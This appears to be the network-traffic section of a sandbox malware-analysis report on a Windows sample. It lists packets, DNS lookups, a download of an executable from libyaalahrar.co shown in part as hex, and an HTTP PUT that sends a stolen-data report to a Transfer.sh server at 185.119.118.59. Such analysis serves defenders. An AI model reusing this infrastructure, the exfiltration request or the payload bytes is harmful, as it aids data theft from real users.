                                                                          Jul 23, 2024 15:47:21.393913031 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393929005 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393935919 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393944025 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393959045 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393975019 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393987894 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393990993 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394005060 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394018888 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394035101 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394594908 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394608974 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394655943 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394718885 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394733906 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394761086 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394773960 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394788980 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394804001 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394813061 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394819975 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394860029 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.395942926 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.395987034 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396051884 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396065950 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396081924 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396097898 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396114111 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396116972 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396136045 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396142960 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396167040 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396176100 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396183014 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396198034 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396214008 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396219015 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396259069 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396277905 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396294117 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396308899 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396330118 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396358967 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396395922 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396471024 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398478985 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398494959 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398520947 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398554087 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398559093 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398572922 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398583889 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398607016 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398617029 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398622990 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398638964 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398662090 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398690939 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398706913 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398720980 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398730040 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398736000 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398750067 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398760080 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398766041 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398787975 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.399962902 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.399988890 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400005102 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400008917 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.400022984 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400063038 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.400068998 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400084972 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400110006 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.400124073 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400163889 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.406907082 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.406934977 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.406951904 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.406996012 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407006025 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.407011986 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407027006 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407032967 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.407042027 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407058001 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407073975 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.407099009 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.407155037 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407171965 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407186031 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407202005 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407216072 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.407216072 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407233000 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407238960 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.407249928 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407275915 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.407305002 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407320976 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407337904 CEST900149729193.142.146.239192.168.2.5

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jul 23, 2024 15:46:38.585251093 CEST192.168.2.51.1.1.10xbe7bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:46:46.486669064 CEST192.168.2.51.1.1.10x254eStandard query (0)securefirewall.portmap.ioA (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:46:50.181355000 CEST192.168.2.51.1.1.10x617eStandard query (0)libyaalahrar.coA (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:01.958019018 CEST192.168.2.51.1.1.10x460dStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:03.067922115 CEST192.168.2.51.1.1.10x333Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:12.615854025 CEST192.168.2.51.1.1.10x5432Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:15.448431015 CEST192.168.2.51.1.1.10x2788Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jul 23, 2024 15:46:38.593274117 CEST1.1.1.1192.168.2.50xbe7bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:46:47.429620981 CEST1.1.1.1192.168.2.50x254eNo error (0)securefirewall.portmap.io193.161.193.99A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:46:50.203350067 CEST1.1.1.1192.168.2.50x617eNo error (0)libyaalahrar.co199.188.200.89A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:01.966474056 CEST1.1.1.1192.168.2.50x460dNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:03.079933882 CEST1.1.1.1192.168.2.50x333No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:03.079933882 CEST1.1.1.1192.168.2.50x333No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:03.079933882 CEST1.1.1.1192.168.2.50x333No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:03.079933882 CEST1.1.1.1192.168.2.50x333No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:13.550637007 CEST1.1.1.1192.168.2.50x5432No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                          Jul 23, 2024 15:47:15.456033945 CEST1.1.1.1192.168.2.50x2788No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549706208.95.112.1802672C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jul 23, 2024 15:46:38.608838081 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                          Host: ip-api.com
                                                                          Connection: Keep-Alive
                                                                          Jul 23, 2024 15:46:39.096231937 CEST175INHTTP/1.1 200 OK
                                                                          Date: Tue, 23 Jul 2024 13:46:38 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 6
                                                                          Access-Control-Allow-Origin: *
                                                                          X-Ttl: 60
                                                                          X-Rl: 44
                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                          Data Ascii: false


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549724208.95.112.1805624C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jul 23, 2024 15:47:13.583383083 CEST85OUTGET /line?fields=query,country HTTP/1.1
                                                                          Host: ip-api.com
                                                                          Connection: Keep-Alive
                                                                          Jul 23, 2024 15:47:14.046308994 CEST196INHTTP/1.1 200 OK
                                                                          Date: Tue, 23 Jul 2024 13:47:12 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 26
                                                                          Access-Control-Allow-Origin: *
                                                                          X-Ttl: 25
                                                                          X-Rl: 43
                                                                          Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                          Data Ascii: United States8.46.123.33


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.549726185.119.118.5980805624C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jul 23, 2024 15:47:14.458898067 CEST203OUTPUT /%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74.%77%73%72 HTTP/1.1
                                                                          Host: 185.119.118.59:8080
                                                                          Content-Length: 147922
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jul 23, 2024 15:47:15.131804943 CEST25INHTTP/1.1 100 Continue
                                                                          Jul 23, 2024 15:47:15.446748972 CEST384INHTTP/1.1 200 OK
                                                                          Content-Type: text/plain
                                                                          Server: Transfer.sh HTTP Server
                                                                          X-Made-With: <3 by DutchCoders
                                                                          X-Served-By: Proudly served by DutchCoders
                                                                          X-Url-Delete: http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user@128757_report.wsr/GSkGoa0ALqi06WR6S2ub
                                                                          Date: Tue, 23 Jul 2024 13:47:15 GMT
                                                                          Content-Length: 68
                                                                          Data Raw: 68 74 74 70 3a 2f 2f 31 38 35 2e 31 31 39 2e 31 31 38 2e 35 39 3a 38 30 38 30 2f 64 30 4f 75 61 71 69 7a 66 7a 2f 69 41 41 44 39 5f 61 6c 66 6f 6e 73 40 31 32 38 37 35 37 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                          Data Ascii: http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user@128757_report.wsr


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549708199.188.200.894432672C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-07-23 13:46:51 UTC95OUTGET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1
                                                                          Host: libyaalahrar.co
                                                                          Connection: Keep-Alive
                                                                          2024-07-23 13:46:51 UTC289INHTTP/1.1 200 OK
                                                                          keep-alive: timeout=5, max=100
                                                                          content-type: application/x-msdownload
                                                                          last-modified: Mon, 22 Jul 2024 19:05:06 GMT
                                                                          accept-ranges: bytes
                                                                          content-length: 511496
                                                                          date: Tue, 23 Jul 2024 13:46:51 GMT
                                                                          server: LiteSpeed
                                                                          x-turbo-charged-by: LiteSpeed
                                                                          connection: close
                                                                          2024-07-23 13:46:51 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c6 a7 9e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 07 00 00 18 00 00 00 00 00 00 c6 98 07 00 00 20 00 00 00 a0 07 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 07 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0| @ @
                                                                          2024-07-23 13:46:51 UTC8192INData Raw: 0e 0e 0e 0e 06 00 02 02 0e 10 08 10 07 0a 12 79 1d 05 08 1d 05 12 7d 08 05 08 08 08 07 00 01 12 7d 11 81 21 05 20 01 01 12 7d 04 20 01 1c 0e 02 1d 05 05 00 00 12 80 dd 05 20 01 1d 05 0e 05 20 02 01 08 08 06 20 01 01 11 81 25 07 20 04 01 08 08 08 08 06 20 01 01 11 81 29 06 20 01 01 11 81 2d 05 20 02 01 1c 18 06 20 01 01 12 81 35 05 00 00 12 81 39 0d 00 06 1c 1c 12 7d 0e 1d 1c 1d 0e 1d 02 05 20 00 1d 12 7d 0d 20 05 1c 0e 11 81 49 12 81 4d 1c 1d 1c 06 20 01 01 11 81 51 05 20 02 01 0c 0c 06 20 01 01 11 81 55 06 20 01 01 11 81 5d 05 20 00 12 81 61 06 20 01 01 12 80 f9 06 20 01 01 12 81 65 06 20 01 1d 0e 1d 03 03 00 00 01 04 00 01 01 02 05 00 01 01 12 4d 05 20 00 12 81 41 07 20 02 01 0e 12 81 41 07 20 02 1c 0e 12 80 95 08 00 01 12 81 71 12 81 71 05 00 01 01 12
                                                                          Data Ascii: y}}! } % ) - 59} } IM Q U ] a e M A A qq
                                                                          2024-07-23 13:46:51 UTC16384INData Raw: d3 95 c7 99 66 b7 f3 b9 81 c2 d5 e1 aa 9e ab c7 6e 2b 7b 46 ce f7 c4 83 d2 62 f8 25 65 30 09 4c 00 29 62 56 5f a0 d0 95 c5 ee 40 e4 d0 96 ba cd 9e 94 b9 f3 cb 8c b9 12 50 64 51 11 57 97 be 89 c8 7c cd 88 da 80 ce 37 f9 b0 88 cf f4 88 f6 c3 f7 b4 ea ae fc 50 08 40 74 2e 01 59 0b 59 14 ef b3 f4 c3 ed 7e 25 10 54 12 1e e1 d7 97 e0 b4 f1 a3 f9 ab d1 6f 25 1d 54 2a f3 b9 8e bc d2 7a 3e 6e 59 18 18 0c 4b 1a 41 13 41 00 37 df 92 a5 d6 9d a9 9c d4 9c d9 78 17 b6 fe ca 8c e0 ae fb a9 a3 e8 d0 97 a0 8f c4 f0 c5 49 01 44 14 23 50 16 fa 9c ce 94 bc ec 32 6d 55 12 21 9a b9 8d b8 f8 88 a9 f9 ce 89 a9 42 ab e6 bc b6 bc fd b7 8f c6 76 39 72 46 6f b0 f6 b3 e3 d0 22 4b 7f 39 61 28 78 0a 4b 01 39 7e 21 f5 be 8a b9 c3 db 9f d0 e8 83 93 01 48 1b 42 e6 b2 78 27 1f 58 6b e4 97
                                                                          Data Ascii: fn+{Fb%e0L)bV_@PdQW|7P@t.YY~%To%T*z>nYKAA7xID#P2mU!Bv9rFo"K9a(xK9~!HBx'Xk
                                                                          2024-07-23 13:46:52 UTC16384INData Raw: ac 9c 4e 5c 1c 5f 2c 73 43 1d d2 78 93 1b 2a 24 1b 9a 55 a0 e6 a5 9f 56 45 03 47 74 43 6b 32 e9 4b 0a 80 eb f8 5d 71 28 65 03 a6 3e d0 16 57 b1 0f 4a 85 58 ed bb b6 78 97 21 78 ec 14 26 8b d0 9c 18 d1 a8 17 c1 73 ce 09 20 ee 67 b7 76 64 4a db 56 db ab dd eb 69 c9 c1 e5 b9 af d1 c1 21 c2 d2 80 9b e8 4e 23 80 08 b0 c8 fa 1f 4d 89 42 ac 83 e7 28 6f b4 f6 6a 71 36 65 2f 7a 46 bb cd 5c cf 15 f1 4e b7 0b 9c f5 16 d0 77 33 66 a4 10 a3 6c 6b 23 05 4e 9d d5 08 34 71 1a a2 59 be bc 42 76 31 9d e9 97 c8 ab 97 c8 40 81 36 10 5d 5e 06 8a d1 9e 4c d5 27 65 24 3f 23 79 74 10 88 b1 33 e6 f0 81 04 2b 97 1e 7c eb fd bf 7d a6 21 75 4f a6 0b fd e8 e1 b9 06 3a 3d d7 6b c9 65 61 34 42 44 1b b0 82 10 7f ed 2b 51 64 bc 4b fe dd b7 6d 2f c8 41 51 ca ee 49 49 76 b1 ca 29 5a ea ad
                                                                          Data Ascii: N\_,sCx*$UVEGtCk2K]q(e>WJXx!x&s gvdJVi!N#MB(ojq6e/zF\Nw3flk#N4qYBv1@6]^L'e$?#yt3+|}!uO:=kea4BD+QdKm/AQIIv)Z
                                                                          2024-07-23 13:46:52 UTC16384INData Raw: be 29 ee 71 d5 23 3d 2a 05 c5 22 05 bf b3 72 b6 77 c4 11 12 bc 95 33 e0 58 f3 53 a3 86 56 d8 a8 7d c6 90 75 bb 78 b0 81 4c 9d 36 03 06 ee 44 fc 64 cc 1b f1 3c c5 15 eb 72 d3 0d 0e ee 56 a8 c5 aa 74 d0 70 d6 75 12 0f db 2f 1d c9 1c eb 65 c2 1c dd 20 04 17 1a c1 1a c8 8e 61 f4 4f 03 4a 90 c0 f7 b6 fd c0 84 d6 8c de 83 bf f5 cd 8a b4 7c 37 03 36 68 16 4d 18 2f 6e 26 12 8a d8 82 d0 82 bf f3 cb 8c bb 6f d1 6c e6 2e 01 d7 59 27 fa 43 15 f2 34 05 dd 2e fb 48 01 d8 c1 b2 8a 51 f4 4f 95 6b f2 57 b0 89 ba fc ae f4 9d 58 b0 8c 81 94 57 20 22 d2 e0 41 94 65 c1 81 4e a1 8f 5c af 87 74 b9 93 d9 e1 a5 8a b6 7e 4a 7f 3b f4 b1 e1 d6 8e c1 f5 b3 e1 b7 e2 b0 f1 bb 66 ce 80 41 96 3d 9b b1 b2 8b 6c f9 57 b3 1e de 2b fd 46 a5 76 0e e2 40 ff 57 d3 79 e6 33 75 30 60 57 07 e2 77
                                                                          Data Ascii: )q#=*"rw3XSV}uxL6Dd<rVtpu/e aOJ|76hM/n&ol.Y'C4.HQOkWXW "AeN\t~J;fA=lW+Fv@Wy3u0`Ww
                                                                          2024-07-23 13:46:52 UTC16320INData Raw: 84 2d ca 73 10 f1 c3 9d b6 28 4a a2 9f 16 5f 62 9a f4 27 98 59 ba ae cc 99 66 3d a3 ab bd 20 1c a0 ae 16 9e ac 7c 2b 4c ad 42 a2 dd a9 26 22 42 e1 8a c9 7d fe 13 09 9d db 51 f3 c0 81 55 06 41 1f 2e da ed 7d d9 05 b7 28 e4 86 af bf 85 12 e4 25 24 74 2e e7 ad c8 97 fb 55 27 63 ab 69 34 a3 95 ce 9d d3 df 62 a9 b1 91 c5 f1 56 27 0b 33 2c 56 e1 df cb 8c 5b a9 de 46 ef 50 45 52 40 56 a5 d6 b1 5e 53 64 f5 2d 3d 2c bf 1e b4 a1 5c 7d 1c 93 52 a7 47 d5 e9 09 cf 34 6a e5 6b 28 4a f2 49 6b 7c f2 30 0c f2 bf c6 e9 93 1c 9a 21 35 58 05 a9 39 5a 9d 26 40 fb e4 2d 3f b7 25 4f ae 80 62 91 36 d7 ab 9c 11 12 2b 6a d9 cb d8 95 af a1 8d 5c cb 5d 5d e9 0a 31 ff 86 b9 a3 6d 94 b7 1e ea ad aa 54 da 54 5d 8b cc ae 49 e5 81 c7 b6 49 d0 c2 a9 43 65 b5 35 a8 09 54 08 2f 0b 71 ff d2
                                                                          Data Ascii: -s(J_b'Yf= |+LB&"B}QUA.}(%$t.U'ci4bV'3,V[FPER@V^Sd-=,\}RG4jk(JIk|0!5X9Z&@-?%Ob6+j\]]1mTT]IICe5T/q
                                                                          2024-07-23 13:46:52 UTC64INData Raw: d0 28 42 a7 56 12 0b 26 c3 91 f8 ce 05 be 96 b3 b3 3f 18 8f 67 7d b4 42 52 c2 41 0a ad 87 fe 0c a2 4a 88 bf 56 40 22 0c 08 83 b1 f9 34 02 e9 e5 7b dd 41 8b cb ea b1 d5 cd 60 09 75 aa 0e c3 d6
                                                                          Data Ascii: (BV&?g}BRAJV@"4{A`u
                                                                          2024-07-23 13:46:52 UTC16384INData Raw: 05 97 59 48 d4 b8 31 7a f0 23 33 bd 6f 39 7f 93 94 b3 1b d2 ea e3 76 26 51 00 3f e0 0b 89 12 77 83 68 1b c5 a3 18 8a b7 a4 f5 bb 13 62 55 5a dd 22 a1 fb 7c d0 89 58 d0 bc 11 89 0c 69 01 a1 58 85 f1 76 c4 e9 81 04 d7 21 55 21 b8 a0 2d 05 e9 94 24 99 49 ac 02 58 52 af 08 d1 18 30 91 f2 bf b7 0e 1b 18 2f 11 82 7a a0 04 34 1c 30 41 a4 7f ae f0 d0 d3 8d a6 cb b4 bf ef a3 26 fb 78 03 06 ba d8 2a 29 c1 be d5 11 05 51 03 eb e2 5a 95 c5 c4 09 45 b2 9c 91 e0 76 d1 84 86 25 34 2d be 3f ed 87 cf f9 1a be 8f c9 23 96 4a cc 8a a2 b1 b5 97 e0 74 3e 35 e0 1c b5 2d c7 87 f2 d5 f3 af 80 fa 95 44 c8 3d 12 51 b3 59 ea ee 9b b2 5d 78 3c ca 89 e2 59 82 44 65 a0 fc 8a c1 7d 04 34 11 9a 16 01 2b 88 7a 27 12 a8 4d 2d df 3d ff 5a 8b eb 25 96 99 4f e1 ba f1 58 be 21 ed 3b a1 67 29
                                                                          Data Ascii: YH1z#3o9v&Q?whbUZ"|XiXv!U!-$IXR0/z40A&x*)QZEv%4-?#Jt>5-D=QY]x<YDe}4+z'M-=Z%OX!;g)
                                                                          2024-07-23 13:46:52 UTC16384INData Raw: 04 1f da 77 f4 b2 a6 c1 e9 e6 e8 51 7b b9 e7 2e 2d ba 9e 96 4a 8b 95 29 5f bf 5c 35 7a 57 36 63 9c 68 ce d8 71 9d 86 7c 39 a8 d8 ff fa 40 dc 66 7f d7 4f 07 2d 26 16 ed 49 7a 18 f4 e0 7a ef 7e 6d cb 44 bd 7c e8 e3 59 0b af 0e 9c 64 d4 d9 f6 65 4e cb 85 05 4a be 97 fa e5 fa 43 dd 77 4b 1b 40 ca e9 e3 06 13 b6 ef 30 58 3a 58 bf 5f de e1 23 b3 d7 6c db 35 e3 d0 cf 6c a1 85 d1 f9 45 ab 1d 9d b4 ee 0d cd db 5a 9a 94 3c 6e f4 c7 36 ce 9c d9 bf 8a 7b 74 d9 3f ba e0 fe e8 b6 63 83 37 1e 52 08 b3 7f 8e eb bc 6f 16 54 bb a4 93 46 8b dd e4 6a 97 ef 0a 6e 9a 66 cc e8 e7 df 4f 2d bf 26 73 71 66 d8 8b 7b 1e 59 3e c2 3f 7e 99 a3 6b 35 77 db d6 3e cf 3e 0a 5a 04 8a 78 a7 d7 1f 05 35 56 41 c2 ac 5e 43 07 4e 4e c1 de b9 e8 7a 5f 83 af 79 86 a2 28 ae 4a 22 de 12 21 b6 9a 7c
                                                                          Data Ascii: wQ{.-J)_\5zW6chq|9@fO-&Izz~mD|YdeNJCwK@0X:X_#l5lEZ<n6{t?c7RoTFjnfO-&sqf{Y>?~k5w>>Zx5VA^CNNz_y(J"!|
                                                                          2024-07-23 13:46:52 UTC8192INData Raw: df 8d a7 8c 01 a4 50 a3 b6 13 6a 64 26 c2 0e d5 fd 97 7a 0e 14 fa c6 1d 24 8c 92 a7 c9 90 52 ea 4a 85 54 1d 44 8a fc 35 de d8 3b f7 c6 95 e5 e7 8a 0a 9d d4 b9 59 66 05 fb f6 2e 7f b1 70 ee d9 6e 1f 6c ca 1f 6d 5d ab af e8 35 e6 c1 c0 fe 7d ef 75 f1 0d 2b b0 a7 7d 95 01 cb 96 ee 6f fa 64 6d 1a d1 a9 f3 b5 a9 41 c1 ed 66 42 fb 9a 0b b4 6f 5c f0 af 5a db 44 6a e5 69 f7 d9 8b e5 7d c3 cd 65 5f 6c ee 3d f3 77 b9 be f2 70 69 d9 fb f6 dc 2c d3 2f c3 86 fe d5 8d bd 72 e6 a2 93 13 56 2f 12 15 bb 16 cc 9b 9b 39 a8 e1 dc 92 fb 3b 77 cc a8 18 65 b8 fd d7 6b 5f 8e 55 50 f0 0a bf 17 6b 56 9d 7a f6 64 da 9d 53 a9 0b 6b ed 8c b2 3d 36 6d 9c 7d fe b3 50 9d 72 65 c0 f7 1d 6f 7c 1a 02 cd 19 33 ef 71 0f c6 cd ba 7c a5 eb d6 03 47 7a 9e 36 64 8e 8c ef 37 a6 26 b6 4f b7 80 e1
